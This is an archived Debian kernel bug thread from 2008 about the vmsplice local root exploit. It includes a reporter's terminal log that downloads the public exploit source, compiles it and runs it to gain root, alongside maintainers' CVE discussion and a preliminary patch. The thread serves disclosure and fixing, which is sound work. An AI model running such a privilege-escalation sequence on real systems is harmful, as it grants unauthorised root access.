FAQ Search Today's Posts Mark Forums Read
» Video Reviews

» Linux Archive

Linux-archive is a website aiming to archive linux email lists and to make them easily accessible for linux users/developers.


» Sponsor

» Partners

» Sponsor

Go Back   Linux Archive > Debian > Debian Kernel

 
 
LinkBack Thread Tools
 
Old 02-09-2008, 11:19 PM
Okulov Vitaliy
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Package: linux-image-2.6.18-6-686
Version: 2.6.18.dfsg.1-17etch1
Severity: critical
Tags: security
Justification: root security hole


Just try explot from http://www.milw0rm.com/exploits/5092 at my
linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
from 2.6.24.1 kernel (CVE-2008-0009/10).

-- System Information:
Debian Release: 4.0
APT prefers stable
APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages linux-image-2.6.18-6-686 depends on:
ii coreutils 5.97-5.3 The GNU core utilities
ii debconf [debconf-2.0] 1.5.11etch1 Debian configuration management sy
ii initramfs-tools [linux-initr 0.85h tools for generating an initramfs
ii module-init-tools 3.3-pre4-2 tools for managing Linux kernel mo

Versions of packages linux-image-2.6.18-6-686 recommends:
ii libc6-i686 2.3.6.ds1-13etch4 GNU C Library: Shared libraries [i

-- debconf information:
shared/kernel-image/really-run-bootloader: true
linux-image-2.6.18-6-686/preinst/elilo-initrd-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/already-running-this-2.6.18-6-686:
linux-image-2.6.18-6-686/postinst/depmod-error-2.6.18-6-686: false
linux-image-2.6.18-6-686/preinst/initrd-2.6.18-6-686:
linux-image-2.6.18-6-686/postinst/old-initrd-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/bootloader-initrd-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/abort-install-2.6.18-6-686:
linux-image-2.6.18-6-686/preinst/lilo-has-ramdisk:
linux-image-2.6.18-6-686/preinst/overwriting-modules-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/bootloader-error-2.6.18-6-686:
linux-image-2.6.18-6-686/prerm/would-invalidate-boot-loader-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/bootloader-test-error-2.6.18-6-686:
linux-image-2.6.18-6-686/postinst/create-kimage-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/depmod-error-initrd-2.6.18-6-686: false
linux-image-2.6.18-6-686/preinst/lilo-initrd-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/old-dir-initrd-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/preinst/failed-to-move-modules-2.6.18-6-686:
linux-image-2.6.18-6-686/preinst/abort-overwrite-2.6.18-6-686:
linux-image-2.6.18-6-686/prerm/removing-running-kernel-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/old-system-map-link-2.6.18-6-686: true
linux-image-2.6.18-6-686/postinst/kimage-is-a-directory:



--
To UNSUBSCRIBE, email to debian-kernel-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
 
Old 02-10-2008, 07:48 AM
Stefan Fritsch
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

2.6.24.1 does not fix the issue, see

http://marc.info/?l=linux-kernel&m=120262352612128&w=2

I have also verified that the lenny 2.6.22 kernel is vulnerable.
 
Old 02-10-2008, 08:14 AM
Stefan Fritsch
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

I also checked that linux-image-2.6.18-5-k7 2.6.18.dfsg.1-17 is
vulnerable.
 
Old 02-10-2008, 08:15 AM
Florian Weimer
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

* Okulov Vitaliy:

> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

Milw0rm is down. Are you sure the exploit is real? The vulnerable code
is not present in the 2.6.18 kernel.




--
To UNSUBSCRIBE, email to debian-kernel-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
 
Old 02-10-2008, 08:27 AM
"Vitaliy Okulov"
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Yep, im sure.

Copy of exploit: http://www.securityfocus.com/bid/27704/exploit


doktor@doktor:~/coding/sample$ wget http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c

--12:25:09-- http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
* => `27704.c'
Resolving downloads.securityfocus.com... 205.206.231.23

Connecting to downloads.securityfocus.com|205.206.231.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,264 (6.1K) [text/plain]

100%[================================================== ================================================== =============>] 6,264 28.84K/s


12:25:10 (28.75 KB/s) - `27704.c' saved [6264/6264]

doktor@doktor:~/coding/sample$ vi 27704.c
doktor@doktor:~/coding/sample$ uname -a
Linux doktor 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux

doktor@doktor:~/coding/sample$ id
uid=1000(doktor) gid=1000(doktor) groups=20(dialout),24(cdrom),25(floppy),29(audio), 44(video),46(plugdev),1000(doktor),1001(shutdown), 1002(vboxusers)
doktor@doktor:~/coding/sample$ head -n 20 27704.c

/*
** jessica_biel_naked_in_my_bed.c
**
** Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
** Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
** Stejnak je to stare jak cyp a aj jakesyk rozbite.

**
** Linux vmsplice Local Root Exploit
** By qaaz
**
** Linux 2.6.17 - 2.6.24.1
**
** This is quite old code and I had to rewrite it to even compile.
** It should work well, but I don't remeber original intent of all

** the code, so I'm not 100% sure about it. You've been warned
**
** -static -Wno-format
**/
#define _GNU_SOURCE
#include <stdio.h>
doktor@doktor:~/coding/sample$ gcc -static -Wno-format 27704.c -o root_expl

doktor@doktor:~/coding/sample$ ./root_expl
-----------------------------------
*Linux vmsplice Local Root Exploit
*By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20

[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7fc8000 .. 0xb7ffa000
[+] root
root@doktor:~/coding/sample# id
uid=0(root) gid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio), 44(video),46(plugdev),1000(doktor),1001(shutdown), 1002(vboxusers)

root@doktor:~/coding/sample# exit
doktor@doktor:~/coding/sample$

So exploit works.


2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
* Okulov Vitaliy:

> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch

> from 2.6.24.1 kernel (CVE-2008-0009/10).

Milw0rm is down.**Are you sure the exploit is real?**The vulnerable code
is not present in the 2.6.18 kernel.
 
Old 02-10-2008, 08:32 AM
Florian Weimer
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

* Vitaliy Okulov:

> Yep, im sure.

Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.



--
To UNSUBSCRIBE, email to debian-kernel-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
 
Old 02-10-2008, 08:39 AM
"Vitaliy Okulov"
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution

"The vendor released version 2.6.24.1 to address these issues. Please see the references for more information."



And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1 where i found only 1 bugfix for vmsplice.

2008/2/10, Florian Weimer <fw@deneb.enyo.de>:
* Vitaliy Okulov:

> Yep, im sure.

Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
 
Old 02-10-2008, 08:49 AM
"Vitaliy Okulov"
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

Oh, just reread http://marc.info/?l=linux-kernel&m=120262352612128&w=2

Thereis no bugfix.


Whait for Jens Axboe to fix this patch.


2008/2/10, Vitaliy Okulov <vitaliy.okulov@gmail.com>:

Hm, maybe, but i read http://www.securityfocus.com/bid/27705/solution

"The vendor released version 2.6.24.1 to address these issues. Please see the references for more information."




And then read http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1 where i found only 1 bugfix for vmsplice.


2008/2/10, Florian Weimer <fw@deneb.enyo.de>:

* Vitaliy Okulov:

> Yep, im sure.

Ah, okay, but I think this is not CVE-2008-0009 or CVE-2008-0010.
 
Old 02-10-2008, 08:53 AM
Florian Weimer
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

* Vitaliy Okulov:

> Oh, just reread http://marc.info/?l=linux-kernel&m=120262352612128&w=2
>
> Thereis no bugfix.

Yes, it appears to be a different bug.



--
To UNSUBSCRIBE, email to debian-kernel-REQUEST@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
 
Old 02-10-2008, 11:00 AM
Bastian Blank
 
Default Bug#464945: linux-image-2.6.18-6-686: Exploit for vmsplice work for linux-image-2.18-5-686 (CVE-2008-0009/10)

tags 464945 patch

On Sun, Feb 10, 2008 at 03:19:20AM +0300, Okulov Vitaliy wrote:
> Just try explot from http://www.milw0rm.com/exploits/5092 at my
> linux-image-2.6.18-5-686 kernel. And it works. Please backport patch
> from 2.6.24.1 kernel (CVE-2008-0009/10).

Preliminary patch, it includes more checks then the update in 2.6.24.1.

It at least fixes the exploit.

Bastian
diff --git a/fs/splice.c b/fs/splice.c
index 684bca3..2d7e598 100644
--- a/fs/splice.c
+++ b/fs/splice.c
@@ -1122,6 +1122,11 @@ static int get_iovec_page_array(const struct iovec __user *iov,
size_t len;
int i;

+ if (!access_ok(VERIFY_READ, iov, sizeof(struct iovec))) {
+ error = -EFAULT;
+ break;
+ }
+
/*
* Get user address base and length for this iovec.
*/
@@ -1141,6 +1146,11 @@ static int get_iovec_page_array(const struct iovec __user *iov,
if (unlikely(!base))
break;

+ if (!access_ok(VERIFY_READ, base, len)) {
+ error = -EFAULT;
+ break;
+ }
+
/*
* Get this base offset and number of pages, then map
* in the user pages.
 

Thread Tools




All times are GMT. The time now is 02:59 PM.

VBulletin, Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO ©2007, Crawlability, Inc.
Copyright 2007 - 2008, www.linux-archive.org